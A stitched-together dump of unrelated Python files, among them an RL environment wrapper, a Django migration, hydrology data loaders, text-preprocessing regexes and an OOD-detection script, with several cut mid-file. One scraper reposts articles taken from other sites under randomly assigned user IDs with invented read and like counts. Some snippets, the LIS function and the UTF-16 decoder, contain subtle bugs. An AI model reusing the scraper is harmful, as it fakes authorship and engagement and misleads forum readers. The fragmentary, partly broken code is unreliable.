np.zeros(maze.shape) self.avg_rewards[self.goal_locations[:, 0], self.goal_locations[:, 1]] = np.inf # self.goal_sampled[self.goal_locations[:, 0], self.goal_locations[:, 1]] = 0 self.alpha = alpha self.all_goals_sampled = False def reset(self) -> VecEnvObs: obs = self.venv.reset() self.episode_returns = np.zeros(self.num_envs, dtype=np.float32) self.episode_lengths = np.zeros(self.num_envs, dtype=np.int32) return obs def step_wait(self) -> VecEnvStepReturn: obs, rewards, dones, infos = self.venv.step_wait() self.episode_returns += rewards self.episode_lengths += 1 new_infos = list(infos[:]) for i in range(len(dones)): if dones[i]: episode_return = self.episode_returns[i] episode_length = self.episode_lengths[i] goal = self.venv.get_attr("goal", i)[0] if self.avg_rewards[goal[1], goal[0]] != np.inf: self.avg_rewards[goal[1], goal[0]] = ( self.alpha * self.avg_rewards[goal[1], goal[0]] + (1 - self.alpha) * episode_return ) else: self.avg_rewards[goal[1], goal[0]] = episode_return if not self.all_goals_sampled: self.goal_sampled[goal[1], goal[0]] = 1 logging.info(np.sum(self.goal_sampled)) if np.sum(self.goal_sampled) == len(self.goal_locations): logging.info("All goals have been sampled at least once.") self.all_goals_sampled = True self.update_probs_from_reward() else: self.update_probs_from_unvisited() else: self.update_probs_from_reward() self.episode_returns[i] = 0 self.episode_lengths[i] = 0 return obs, rewards, dones, new_infos def update_probs_from_unvisited(self): not_visited = np.zeros(self.avg_rewards.shape) not_visited[self.goal_locations[:, 0], self.goal_locations[:, 1]] = 1 not_visited = not_visited - self.goal_sampled prob_positions = not_visited[ self.goal_locations[:, 0], self.goal_locations[:, 1] ] probs = prob_positions / np.sum(prob_positions) self.venv.env_method("update_goal_probs", probs) def update_probs_from_reward(self): rew_per_goal = self.avg_rewards[ self.goal_locations[:, 0], self.goal_locations[:, 1] ] rew_per_goal = rew_per_goal * -1 rew_per_goal = rew_per_goal + np.min(rew_per_goal) * -1 + 0.01 probs = rew_per_goal / np.sum(rew_per_goal) self.venv.env_method("update_goal_probs", probs) def close(self) -> None: if self.results_writer: self.results_writer.close() return self.venv.close() gennadis/dvmn_teams # Generated by Django 4.0.1 on 2022-01-27 10:57 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ("teams", "0006_team_time_slot"), ] operations = [ migrations.AddField( model_name="student", name="team", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="Students", to="teams.team", verbose_name="Student team", ), ), migrations.AddField( model_name="student", name="time_slot", field=models.ManyToManyField( blank=True, related_name="Students", to="teams.TimeSlot", verbose_name="Student time slot", ), ), migrations.AlterField( model_name="team", name="pm", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="Teams", to="teams.pm", verbose_name="Team PM", ), ), migrations.AlterField( model_name="team", name="time_slot", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="Teams", to="teams.timeslot", verbose_name="Team time slot", ), ), ] #! /usr/bin/env python import os import shutil import sys import unittest import base from dynamo_consistency import main from dynamo_consistency import picker from dynamo_consistency import history from dynamo_consistency import config class TestNoOrphanMain(unittest.TestCase): def setUp(self): config.CONFIG = None config.LOCATION = 'consistency_config.json' main.opts.NOORPHAN = False for dirname in ['www', 'var']: if os.path.exists(dirname): shutil.rmtree(dirname) main.registry.deleted = [] def run_main(self): main.main(picker.pick_site()) self.assertEqual(history.missing_files(main.config.SITE), ['/store/data/runB/0003/missing.root']) self.assertFalse(history.orphan_files(main.config.SITE)) self.assertEqual(history.empty_directories(main.config.SITE), ['/store/data/runC/0000/emtpy/dir', '/store/data/runC/0000/emtpy', '/store/data/runC/0000', '/store/data/runC']) self.assertEqual(sorted(main.registry.deleted, reverse=True), history.empty_directories(main.config.SITE)) def test_flag(self): main.opts.NOORPHAN = True self.run_main() def test_config(self): config.LOCATION = 'txtfiles/no_orphan_config.json' self.run_main() if __name__ == '__main__': unittest.main(argv=base.ARGS) # -*- coding: utf-8 -*- import os import random from datetime import datetime from urlparse import urlparse from uuid import uuid4 import requests import sys from bs4 import BeautifulSoup from qiniu import put_file, Auth from app.dao.thread_dao import ThreadDao, ForumThreadRelationDao, ForumDao from app.models import Thread, ForumThreadRelation reload(sys) sys.setdefaultencoding( "utf-8" ) bucket_name='cniao5-imgs' base_dir="//Users/Ivan.Wong/tempdata" base_img_url="http://7mno4h.com1.z0.glb.clouddn.com/" baseurl ="http://www.jianshu.com/" article_base_url =baseurl+"/p/"; listurl = baseurl +str("collections/284/notes?order_by=added_at&page=") user_ids=[10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287,10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298, 10299,10300,10301,10302,10303,10304,10305,10306,10307,10308,10309,10310,10311, 10312,10313,10314,10315,10316,10317,10318,10319,10320,10321,10322,10323,10324,10325,10326,10327,10328] q = Auth('', '') class HtmlSpider(): def save_article_to_db(self,title,content,brief,img_links,user_id=None,forum_id=None): img_links = ",".join(img_links) if user_id==None: try: user_id = user_ids[random.randint(0, 52)] except: user_id=user_ids[0] try: read_count = random.randint(200, 10000) like_count = random.randint(20, 1000) thread = Thread( title=title, content=content, imgs=img_links, user_id=user_id, created_time=datetime.now(), read_count=read_count, is_original=0, brief=brief, status =1, like_count=like_count, thread_type=1 ) thread_dao = ThreadDao() thread_dao.save(thread) print 'forum_id='+str(forum_id) if forum_id is not None and forum_id>0: relation= ForumThreadRelation(forum_id=forum_id,thread_id=thread.id, created_time=datetime.now()) ForumThreadRelationDao().save(relation) forum_dao = ForumDao() forum = forum_dao.get(forum_id) #数量加1 forum.thread_count+=1 forum_dao.save(forum) except: pass def download_img(self,url_str,filename=None): try: if filename==None: filename==self.get_filename(url_str) self.mkdirs(base_dir) r = requests.get(url_str,timeout=10) chunk_size=100 with open(base_dir+filename, 'wb') as fd: for chunk in r.iter_content(chunk_size): fd.write(chunk) self.upload_file_to_qiniu(base_dir+filename,filename) except: pass def delfile_from_dir(self,file_path): os.remove(file_path) def mkdirs(self,path): if not os.path.isdir(path): os.makedirs(path) def get_filename(self,url_str): url = urlparse(url_str) i = len(url.path) - 1 while i > 0: if url.path[i] == '/': break i = i - 1 file_name=url.path[i+1:len(url.path)] extension="jpg" if file_name !='': try: extension=file_name.split(".")[1] except: pass return str(uuid4())+"."+extension def upload_file_to_qiniu(self,file_path,file_key): token = q.upload_token(bucket_name, file_key, 3600) ret, info = put_file(token, file_key, file_path) if(info.status_code==200): # self.delfile_from_dir(file_path) print 'upload file finish %s'%file_key def delfile_from_dir(self,file_path): os.remove(file_path) class JianshuSpider(HtmlSpider): def get_jianshu_articles(self,startpage,endpage): while startpage<=endpage: self.getlist(startpage) startpage+=1 def getlist(self,pageindex): url =listurl+str(pageindex) page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') titles = soup.find_all("h4",{"class":"title"}); for title in titles: next = title.next_element href= next.get("href") article_url = baseurl+href self.get_article_detail(article_url) print "finish page=============="+str(pageindex) def get_jianshu_article(self,article_id,user_id=None,forum_id=None): url = article_base_url+str(article_id) self.get_article_detail(url,user_id,forum_id) def get_article_detail(self,url,user_id=None,forum_id=None): page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') article = soup.find("div",{"class":"article"}) title = article.find("h1",{"class":"title"}).text context = article.find("div",{"class":"show-content"}) imgs = context.find_all("img") img_links =[] if len(imgs)>0: for img in imgs: img_url= img.get("src"); if 'githubusercontent.com' in img_url or 'github.com' in img_url: continue filename = self.get_filename(img_url) src =base_img_url+filename img["src"]=src img["data-original-src"]=src self.download_img(img_url,filename) img_links.append(src) brief = context.text[0:200] self.save_article_to_db(title,context.prettify(),brief,img_links,user_id,forum_id) class LcodeSpider(HtmlSpider): def get_article_detail(self,url,user_id=None,forum_id=None): page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') article_eml= soup.find("article") title = article_eml.find("h1",{"class":"entry-title"}).text.strip() content_eml = article_eml.find("div",{'class':'entry-content'}) content_eml.find("div",{"class":"ads_page_top"}).decompose() gutters = content_eml.select(".gutter") if len(gutters)>0: for gutter in gutters: gutter.decompose() line_numbers= content_eml.select(".line-numbers") if len(line_numbers)>0: for line in line_numbers: line.decompose() js_scritpts = content_eml.select("script") if len(js_scritpts)>0: for js in js_scritpts: js.decompose() content_eml.find(id="jiathis_style_32x32").parent.decompose() single_pages= content_eml.select(".pull-right.single-pages") if len(single_pages)>0: for sp in single_pages: sp.decompose() ps = content_eml.select("p") for p in ps: string = p.string if '关注我的订阅号' in str(string): siblings=p.find_next_siblings() for sb in siblings: sb.decompose() p.decompose() imgs = content_eml.find_all("img") img_links =[] if len(imgs)>0: for img in imgs: img_url= img.get("data-original"); if img_url==None: img_url = img.get("src") if img_url==None: return if img_url.startswith('data'): continue filename = self.get_filename(img_url) src =base_img_url+filename img["src"]=src img["data-original"]=src img["data-original-src"]=src img.parent["href"]=src self.download_img(img_url,filename) img_links.append(src) brief = content_eml.text[0:200] self.save_article_to_db(title,content_eml.prettify(),brief,img_links,user_id,forum_id) def getlist(self,user_id=None,forum_id=None): url ='http://www.lcode.org/react-native/' page = requests.get(url); soup =BeautifulSoup(page.content,'html5lib') content_eml= soup.find("div",{"class":'page-content'}) links = content_eml.find_all("a") for link in links: href = link.get("href") if href=='http://www.lcode.org' or href=='https://github.com/jiangqqlmj/WeixinArticles/blob/master/README.md': continue if href=='https://github.com/Bob1993/React-Native-Gank': break self.get_article_detail(href,user_id,forum_id) class SegmentfaultSpider(HtmlSpider): def get_article_detail(self,url,user_id=None,forum_id=None): pass class CSDNSpider(HtmlSpider): def get_article_detail(self,url,user_id=None,forum_id=None): pass class ThreadHtmlPareser(HtmlSpider): def __init__(self): self.imgs = [] self.content='' def pasert(self,content): soup =BeautifulSoup(content,'html5lib') js_scritpts = soup.select("script") if len(js_scritpts)>0: for js in js_scritpts: js.decompose() imgs = soup.find_all("img") if len(imgs)>0: for img in imgs: self.imgs.append(img.get('src')) links = soup.find_all("a") if len(links) >0: for link in links: click_evnt = link.get('onclick') if click_evnt is not None: link['onclick']='' self.content = soup.body def show(self,content,show_hide=False): if content==None: return soup =BeautifulSoup(content,'html5lib') if show_hide==False: hides = soup.find_all("hide") for hide in hides: new_tag = soup.new_tag("div") new_tag.string='这里有隐藏内容,回复文章后刷新页面可见' new_tag['class']='attach_nopermission' hide.replace_with(new_tag) result = soup.body return result # Code to find the length of the longest increasing sequence def lis(sn): length_longest = [] for i in range(len(sequence_of_numbers)): length_longest.append(1) for i in range(0, len(sn)): for j in range(0, i ): print('sn[{}] : {} | sn[{}] : {} | ll[{}] : {} | ll[{}]:{}'.format(i,sn[i],j,sn[j],i,length_longest[i],j,length_longest[j] )) if sn[j] < sn[i] and length_longest[j] >= length_longest[i]: length_longest[i] = 1 + length_longest[j] return length_longest def max_lis_length(sequence_of_numbers): return max(lis(sequence_of_numbers)) def main(sequence_of_numbers): print('Max length : {}'.format(max_lis_length(sequence_of_numbers))) if __name__ == '__main__': sequence_of_numbers = [ 3,4,5,1,3,4,9 ] print(sequence_of_numbers) main(sequence_of_numbers) behnam/pycodepoints # # Copyright (c) 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. An additional grant # of patent rights can be found in the PATENTS file in the same directory. # from __future__ import unicode_literals from builtins import chr import sys def is_leading_surrogate(code_unit): return 0xD800 <= code_unit <= 0xDBFF def is_trailing_surrogate(code_unit): return 0xDC00 <= code_unit <= 0xDFFF def decode_surrogate_pair(leading, trailing): return ((leading - 0xD800) << 10) + (trailing - 0xDC00) + 0x10000 def _from_unicode(unistr): return [ord(c) for c in unistr] def _from_utf16(unistr): assert sys.maxunicode == 0xFFFF leading_surrogate = -1 for utf16 in unistr: code_unit = ord(utf16) if leading_surrogate == -1: if is_leading_surrogate(code_unit): leading_surrogate = code_unit else: yield code_unit else: if is_trailing_surrogate(code_unit): # Valid surrogate pair code_point = decode_surrogate_pair(leading_surrogate, code_unit) yield code_point leading_surrogate = -1 else: # Leading surrogate without trailing surrogate yield leading_surrogate if is_leading_surrogate(code_unit): leading_surrogate = code_unit else: yield code_point leading_surrogate = -1 # Dangling surrogate at end of input if leading_surrogate != -1: yield leading_surrogate def _to_utf16(code_points): for code_point in code_points: if code_point <= 0xFFFF: yield chr(code_point) else: base = code_point - 0x10000 high_surrogate = (base >> 10) + 0xD800 low_surrogate = (base & 0x3FF) + 0xDC00 yield chr(high_surrogate) yield chr(low_surrogate) def _to_chars(code_points): return [chr(cp) for cp in code_points] if sys.maxunicode == 0xFFFF: from_unicode = _from_utf16 to_chars = _to_utf16 else: assert sys.maxunicode == 0x10FFFF from_unicode = _from_unicode to_chars = _to_chars def to_unicode(code_points): return u''.join(to_chars(code_points)) from flask import Flask from flask_restful import Api from config import app_config from .orders import OrderDetals, NewOrderPlacement, DisplayAllOrders def create_app(config_stage): app = Flask(__name__) app.config.from_object(app_config[config_stage]) api = Api(app) api.add_resource(OrderDetals, '/api/v1/orders/') api.add_resource(NewOrderPlacement, '/api/v1/orders') api.add_resource(DisplayAllOrders, '/api/v1/orders') return app 0 import os import tensorflow as tf from tensorflow.keras import backend as K from tensorflow.keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D, Dropout, Dense, Activation from tensorflow.keras.models import Sequential from tensorflow.keras.optimizers import Adam from tensorflow.keras.applications import imagenet_utils from tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping from lesion_classifier import LesionClassifier from base_model_param import BaseModelParam class VanillaClassifier(LesionClassifier): """ NOT IMPLEMENTED!!! Model trained from scratch for skin lesion classification """ @property def model(self): return self._model @property def model_name(self): return self._model_name @staticmethod def preprocess_input(x, **kwargs): """Preprocesses a numpy array encoding a batch of images. # Arguments x: a 4D numpy array consists of RGB values within [0, 255]. # Returns Preprocessed array. """ return imagenet_utils.preprocess_input(x, mode='tf', **kwargs)1-10 # uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: otp.speedchat.SpeedChatGlobals from SCTerminal import SCTerminalSelectedEvent from SCTerminal import SCTerminalLinkedEmoteEvent from SCStaticTextTerminal import SCStaticTextMsgEvent from SCGMTextTerminal import SCGMTextMsgEvent from SCCustomTerminal import SCCustomMsgEvent from SCEmoteTerminal import SCEmoteMsgEvent, SCEmoteNoAccessEventhydropy/reading_third_party_data.py # -*- coding: utf-8 -*- """ Reading data from external sources , , """ from __future__ import absolute_import, print_function import os import sys import ftplib from io import StringIO import datetime import numpy as np import pandas as pd import requests from . import exceptions def load_VMM_zrx_timeserie(filename): """ Read VMM zrx files and converts it into a pd.DataFrame Parameters ---------- filename : str full path name to the file to read in Returns ------- data : pd.DataFrame pd.DataFrame of the VMM data """ zrxf = open(filename, 'r') # define header length (= number of lines with starting #) ctestall = zrxf headerlength = 0 ctest = '#' while ctest == '#': ctest = ctestall.readline()[0] headerlength += 1 print('File ', filename.split("\\")[-1], ' headerlength is: ', headerlength-1) zrxf.close() # Read the data data = pd.read_table(filename, sep=' ', skiprows=headerlength-1, index_col=0, parse_dates=True, header=None, usecols=(0, 1), names=['Time', filename.split("\\")[-1][:-4]], na_values='-777.0') return data def _gettext(ftp, filename, outfile=None): """ Help function for scraping text from the ftp-driver (for binary data, another format would be needed) """ # fetch a text file if outfile is None: outfile = sys.stdout # use a lambda to add newlines to the lines read from the server ftp.retrlines("RETR " + filename, lambda s, w=outfile.write: w(s+"\n")) def load_VMM_zrx_timeseries_from_ftp(server, login, password, path, dataname="_DATA"): """ Read all VMM zrx files in a specific folder, concatenates them and converts it into a pd.DataFrame Parameters ---------- server : str ftp server location, e.g. ftp.anteagroup.be login : str login name of the ftp drive password : str password of the user path : str path name to the folder with the interested .zrx files dataname : str suffix name used to flag the saved data Returns ------- data : pd.DataFrame pd.DataFrame of the VMM data """ ftp = ftplib.FTP(server) ftp.login(login, password) # discharge -> go to discharge folder ftp.cwd(path) # check the files in the folder files = ftp.nlst() # We're interested in the .zrx files, so let's get the information of # those in a dictionary, with the key the station code and the data a # pandas Dataframe first exclude in the files list the none-zrx files files = [zrxf for zrxf in files if '.zrx' in zrxf] data = [] for zrxf in files: output = StringIO.StringIO() _gettext(ftp, zrxf, output) # define header length (= number of lines with starting #) ctestall = StringIO.StringIO(output.getvalue()) headerlength = 0 ctest = '#' while ctest == '#': ctest = ctestall.readline()[0] headerlength += 1 print('File ', zrxf, ' headerlength is: ', headerlength-1) temp = pd.read_table(StringIO.StringIO(output.getvalue()), sep=' ', skiprows=headerlength-1, index_col=0, parse_dates=True, header=None, usecols=(0, 1), names=['Time', zrxf[:-4]], na_values='-777.0') data.append(temp) output.close() ftp.close() # CONCATENATE THE DIFFERENT DATAFRAMES IN ONE BIG: data2 = pd.concat(data, axis=1) # SAVE THE DATA IN ONE PICKLE FOR NEXT TIME WORKING WITH THESE data2.to_csv(datetime.datetime.now().strftime("%Y%m%d") + "VMM_" + dataname+".csv", float_format="%.3f", na_rep="Nan") data2.to_pickle(datetime.datetime.now().strftime("%Y%m%d") + "VMM_" + dataname) def _minutes2hours(minutes): """convert minutes to hours and return als rest """ return minutes/60, minutes % 60 def load_CEH_timeserie(filename): """ Read VMM zrx files and converts it into a pd.DataFrame Parameters ---------- filename : str full path name to the file to read in Returns ------- data : pd.DataFrame pd.DataFrame of the VMM data """ parse = lambda y,m,d,h: datetime.datetime(int(y), int(m), int(d), _minutes2hours(int(h))[0], _minutes2hours(int(h))[1]) ceh_data = pd.read_csv(filename, sep=',', parse_dates={"Datetime": [1, 2, 3, 4]}, date_parser=parse, skipinitialspace=True) ceh_data = ceh_data.set_index("Datetime") return ceh_data def get_usgs(site, service, start_date, end_date): """Request stream gauge data from the USGS NWIS. Args: site (str): a valid site is 01585200 service (str): can either be 'iv' or 'dv' for instantaneous or daily data. iv data are instantaneous values usually recorded every 15 minutes; units are expressed as cubic feet/second. dv data are daily mean discharges expressed as cubic feet/second. start_date (str): should take on the form yyyy-mm-dd end_date (str): should take on the form yyyy-mm-dd Returns: A Pandas dataframe object. Raises: ConnectionError due to connection problems like refused connection or DNS Error. HydroNoDataError when the request is valid, but NWIS has no data for the parameters provided in the request. Example:: >>> from hydropy import hydropy as hp >>> my_df = hp.get_usgs('01585200', 'dv', '2012-06-01', '2012-06-05') >>> my_df value datetime 2012-06-01 97.00 2012-06-02 5.80 2012-06-03 1.70 2012-06-04 1.40 2012-06-05 0.96 """ response_obj = request_nwis(site, service, start_date, end_date) nwis_df = extract_nwis_df(response_obj) return nwis_df def request_nwis(site, service, start_date, end_date): """Request stream gauge data from the USGS NWIS. Args: site (str): a valid site is 01585200 service (str): can either be 'iv' or 'dv' for instantaneous or daily data. start_date (str): should take on the form yyyy-mm-dd end_date (str): should take on the form yyyy-mm-dd Returns: a response object. * response.url: the url we requested data from. * response.status_code: * response.json: the content translated as json * response.ok: "True" when we get a '200' Raises: ConnectionError due to connection problems like refused connection or DNS Error. Example:: >>> import hydropy as hp >>> # this requests: http://waterservices.usgs.gov/nwis/dv/?format=json,1.1&sites=01585200&startDT=2012-06-01&endDT=2012-06-05 >>> response = hp.get_nwis('01585200', 'dv', '2012-06-01', '2012-06-05') >>> response >>> response.ok True >>> response.json() *JSON ensues* The specification for this service is located here: http://waterservices.usgs.gov/rest/IV-Service.html """ header = { 'Accept-encoding': 'gzip', 'max-age': '120' } values = { 'format': 'json,1.1', 'sites': site, 'parameterCd': '00060', # represents stream discharge. # 'period': 'P10D' # This is the format for requesting data for a period before today 'startDT': start_date, 'endDT': end_date } url = 'http://waterservices.usgs.gov/nwis/' url = url + service + '/?' response = requests.get(url, params=values, headers=header) # requests will raise a 'ConnectionError' if the connection is refused # or if we are disconnected from the internet. # I think that is appropriate, so I don't want to handle this error. # TODO: where should all unhelpful ('404' etc) responses be handled? return response def extract_nwis_df(response_obj): """Returns a Pandas dataframe from an NWIS response object. Returns: a pandas dataframe. Raises: HydroNoDataError when the request is valid, but NWIS has no data for the parameters provided in the request. """ nwis_dict = response_obj.json() # strip header and all metadata. ts = nwis_dict['value']['timeSeries'] if ts == []: # raise a HydroNoDataError if NWIS returns an empty set. # # Ideally, an empty set exception would be raised when the request # is first returned, but I do it here so that the data doesn't get # extracted twice. # TODO: raise this exception earlier?? # # ** Interactive sessions should have an error raised. # # **Automated systems should catch these errors and deal with them. # In this case, if NWIS returns an empty set, then the request # needs to be reconsidered. The request was valid somehow, but # there is no data being collected. # TODO: this if clause needs to be tested. raise exceptions.HydroNoDataError("The NWIS reports that it does not" " have any data for this request.") data = nwis_dict['value']['timeSeries'][0]['values'][0]['value'] # print("inside extract_nwis_df") # print(data) DF = pd.DataFrame(data, columns=['dateTime', 'value']) DF.index = pd.to_datetime(DF.pop('dateTime')) DF.value = DF.value.astype(float) # DF.index.name = None DF.index.name = 'datetime' # this is never tested DF.replace(to_replace='-999999', value=np.nan, inplace=True) return DFdeepracing_rclcpp/launch/utilities.launch.py """Launch the cpp_code executable in this package""" import os import launch_ros.actions from launch import LaunchDescription from launch.actions import DeclareLaunchArgument from launch.substitutions import LaunchConfiguration, Command from ament_index_python.packages import get_package_share_directory def generate_launch_description(): config_dir = os.path.join(get_package_share_directory("deepracing_rclcpp"),"config") config_file = DeclareLaunchArgument("config_file", default_value=os.path.join(config_dir, "tf_updater.yaml")) entries = [config_file] entries.append(launch_ros.actions.Node(package='deepracing_rclcpp', name='f1_boundary_publisher', executable='boundary_publisher', output='screen', parameters=[{"track_search_dirs": os.getenv("F1_TRACK_DIRS","").split(os.pathsep)}], remappings=[("motion_data", "/f1_game/motion_data"), ("session_data", "/f1_game/session_data")])) entries.append(launch_ros.actions.Node(package='deepracing_rclcpp', name='f1_tf_updater', executable='tf_updater', output='screen', parameters=[LaunchConfiguration(config_file.name)], remappings=[("motion_data", "/f1_game/motion_data"), ("session_data", "/f1_game/session_data")])) return LaunchDescription(entries)preprocessing/preprocess_util.py import re import string import unicodedata from abc import abstractmethod from operator import itemgetter # # Regex patterns # from inputoutput.readers import InputReader re_whitespace = re.compile('\s+') re_html = re.compile(r'<[^>]+>') re_unicode_decimal = re.compile(r'&#(\d{2,4});|&([a-z]+);') re_unicode = re.compile(r'[^\x00-\x7f]') re_html_a_tag = re.compile(r']*>(.+)', flags=re.IGNORECASE) re_next_word = re.compile(r'\s*(\w+)(…|[.][.][.])?') re_non_alpha = re.compile(r'\W+') CURRENCY_PATTERN = r'[$€](\d+(?:[,]\d+)*(?:[.]\d+)?)' re_currency = re.compile(r'(?:^|\s+)' + CURRENCY_PATTERN + r'(?:$|\s+)') re_currency = re.compile(CURRENCY_PATTERN) re_quotations = re.compile(r'"\s*([^"]+)[.]?\s*"') re_quotations_somewhere = re.compile(r'.*"\s*([^"]+)[.]?\s*".*') re_quotations_somewhere_single = re.compile(r".*'\s*([^']+)[.]?\s*'.*") re_quotations_somewhere_slashes = re.compile(r".*/\s*([^/]+)[.]?\s*/.*") re_title_2 = re.compile(r"\s*=\s*'([^']+)';?.*") re_url_wp_date = re.compile(r'.*/wp/\d\d\d\d/\d\d/\d\d/([^/]*)/.*') re_url_stripes = re.compile(r'/(\w+-?-\w+-?-\w+(?:-?-\w+)+)') re_url_stripes_no_id = re.compile(r'(\w+(?:-?-[0-9a-zA-Z]+)+)-\d+') # # Manual replacement # drop_punctuation = [',', '.', '#', '@', '[', ']', '{', '}', '"', ':', '!', "'", '?', '\\'] replace_html_entities = ( ('&', 'and'), ('>', '>'), ('<', '<'), ('“', "'"), ('”', "'"), ('"', "'"), (r"\\'", "'"), (r"\'", "'"), ("`", "'"), ) replace_abbreviations = ( ("ain't", 'are not'), ("can't", 'cannot'), (" he's", ' he is'), (" she's", ' she is'), (" we're", ' we are'), ("we're", 'we are'), (" w/", ' with'), ) # # Helper functions # def re_currency_matches(string): amounts = [] factor = 1 prev_word = None for m in re_currency.finditer(string): amount = ''.join(m.groups('')) try: amount = float(amount.replace(',', '')) except ValueError: print("Strange amount found: %s" % amount) continue next_word_match = re_next_word.search(string, m.end()) if next_word_match: nxt = next_word_match.group(1).lower() cutoff = next_word_match.group(2) is not None if cutoff: pass elif nxt == 'k' or nxt == 'g' or nxt == 'grand': factor = 1000 elif nxt == 'm' or nxt == 'mm' or nxt == 'mil' or nxt == 'mill' or nxt == 'milion' or nxt == 'million': factor = 1000000 elif nxt == 'b' or nxt == 'bil' or nxt == 'bill' or nxt == 'bilion' or nxt == 'billion': factor = 1000000000 elif nxt == 't' or nxt == 'tril' or nxt == 'trill' or nxt == 'trilion' or nxt == 'trillion': factor = 1000000000000 elif nxt == 'bn': pass if prev_word: if prev_word.isdigit(): amounts[-1] *= factor amount *= factor prev_word = nxt else: prev_word = None amounts.append(amount) return amounts def re_date_matches(text): pass def remove_by_indices(s, entities): """ remove hashtags, mentions, urls, symbols (stripped_text) :param s: :param entities: array of dict with 'indices' key :return: s - all entities """ index_offset = 0 strip_indices = [] for type, enities in entities.items(): for enitiy in enities: strip_indices.append((enitiy['indices'][0], enitiy['indices'][1],)) strip_indices.sort(key=itemgetter(0)) for (index_start, index_end) in strip_indices: s = s[:index_start - index_offset] + s[index_end - index_offset:] index_offset += index_end - index_start return s def replace_in_string(s, replace_pairs): """ :param s: :param replace_pairs: :return: new string, the difference in characters, number of replacement operations """ n = len(s) hits = 0 for (find, replace) in replace_pairs: i = 0 while True: i = s.find(find, i) if i == -1: break s = s[0:i] + replace + s[i + len(find):] hits += 1 if hits > n: raise Exception("Livelock") return s, n - len(s), hits def remove_strings(s, remove_substrings): """ :param s: :param remove_substrings: :return: new string, the difference in characters, number of replacement operations """ n = len(s) hits = 0 for find in remove_substrings: i = 0 while True: i = s.find(find, i) if i == -1: break s = s[0:i] + s[i + len(find):] hits += 1 return s, n - len(s), hits def remove_unicode(s): n = len(s) s = unicodedata.normalize('NFKD', s) s = s.encode('ascii', 'ignore') s = s.decode('latin-1') n -= len(s) return s, n def replace_whitespaces(s): s = s.strip() s = re_whitespace.sub(' ', s) return s def remove_unprintable(s): n = len(s) s = ''.join(filter(lambda x: x in string.printable, s)) n -= len(s) return s, n def replace_nonalpha_in_string(s, repl=' '): return re_non_alpha.sub(repl, s) class MultiProcessor: """ Helper class to read and write large files. And also parse the users """ def __init__(self, reader: InputReader, writers): """ :param reader: :param writers: list of writers """ self.reader = reader assert len(writers) > 0 self.writers = writers def __call__(self, n=None): """ :param n: number of input items to parse """ for raw_data_element in self.reader: try: self.process(raw_data_element) except Exception as e: print("Warning: could not process %s:%d %s" % (self.reader.current_file, self.reader.i, e)) print(" data: %s" % raw_data_element) output_array = None if n is not None and self.reader.i == n: break self.done() @abstractmethod def process(self, raw_data): """ :param raw_data: :return: None """ pass def processed_obj(self, i, obj): """ :param i: index of writer to use :param obj: obj that is processed :return: """ self.writers[i].write(obj) def done(self): for w in self.writers: w.close() print("Done processing %d to %s" % (self.reader.i, [w.i for w in self.writers])) 0 # ** OOD detection using 1-sample typicality test (Nalisnick et al,2019; Morningstar et al,2020) import pickle import numpy as np import matplotlib.pyplot as plt import eval # Loading loglikelihoods from file def load_datall(resfile,dataind): #resfile: file path #dataind: indices of the samples whose LL should be loaded indic = pickle.load(open(resfile, 'rb')) features=indic['data']['LL'][dataind[0]:dataind[1]] features = np.array(features).transpose() return features # Obtaining the operating curve of the OOD classifier, which here means the confusion matrix (true/false positive/negatives) at a number of different threshold values (positive=OOD). # The thresholds are chosen uniformly over the range [min_score,max_score] where the min and max scores are the likelihood deviation scores over all of the data (both in and out of distributions). # The score is the absolute difference of likelihood with mean of training data likelihoods (higher score means more OOD). def Opcurve(x_train,x_in,x_out,ndivs): # x_train: log-likelihoods corresponding to training samples # x_in,x_out: log-likelihoods corresponding to in-distribution and OOD test samples # ndivs: number of threshold values to compute the measures at n_in=x_in.shape[0] n_out=x_out.shape[0] meanll=x_train.mean() lldif_in=np.abs(x_in-meanll) lldif_out = np.abs(x_out - meanll) maxs = max(lldif_in.max(), lldif_out.max()) mins = min(lldif_in.min(), lldif_out.min()) thres = np.linspace(mins, maxs, ndivs) truepos=[] falsepos=[] trueneg=[] falseneg=[] for th in thres: c1 = np.sum(lldif_in > th) c2 = np.sum(lldif_out > th) truepos.append(float(c2)) falsepos.append(float(c1)) trueneg.append(float(n_in-c1)) falseneg.append(float(n_out-c2)) rdic={'TP':truepos,'FP':falsepos,'TN':trueneg,'FN':falseneg,'N_in(neg)':n_in,'N_out(pos)':n_out,'Threshs':thres} return rdic # Running the main OOD detection algorithm, and obtaining the evaluation measures and plots on a set of dataset pairs def RunOOD(indis_file,testout_files,ntrain,showplot=False): #indis_file: name of the file containing the statistics on in-distribution data #testout_files: list of names of the files containing the statistics on OOD data #ntrain: number of the in-distribution samples used to train the classifier (others are used for test) based='savedcomps/' #base file path cpoints=200 #number of points on the ROC and PR curves print("*OOD using 1sample Typicality Test") x_train = load_datall(based+indis_file+".sts", (0, ntrain)) fdic = pickle.load(open(based+indis_file+".sts", 'rb')) trainame=fdic['info']['model_trained_data'] print("training file:",indis_file) resdic = dict() resdic['trainfile'] = indis_file resdic['trainsize'] = x_train.shape resdic['method']='llthre' resdic['outfiles']=testout_files resdic['opcurves']=[] x_test_in = load_datall(based+indis_file+".sts", (ntrain, 2*ntrain)) print("training shape:", x_train.shape, "test shape:", x_test_in.shape) for fout in testout_files: x_test_out = load_datall(based + fout+".sts", (0, ntrain)) fdic = pickle.load(open(based + fout+".sts", 'rb')) print("\nOOD set:", fdic['info']['evaldata']) if not fdic['info']['model_trained_data']==trainame: print("Warning: mismatch with in-distribution") oc = Opcurve(x_train,x_test_in,x_test_out, cpoints) 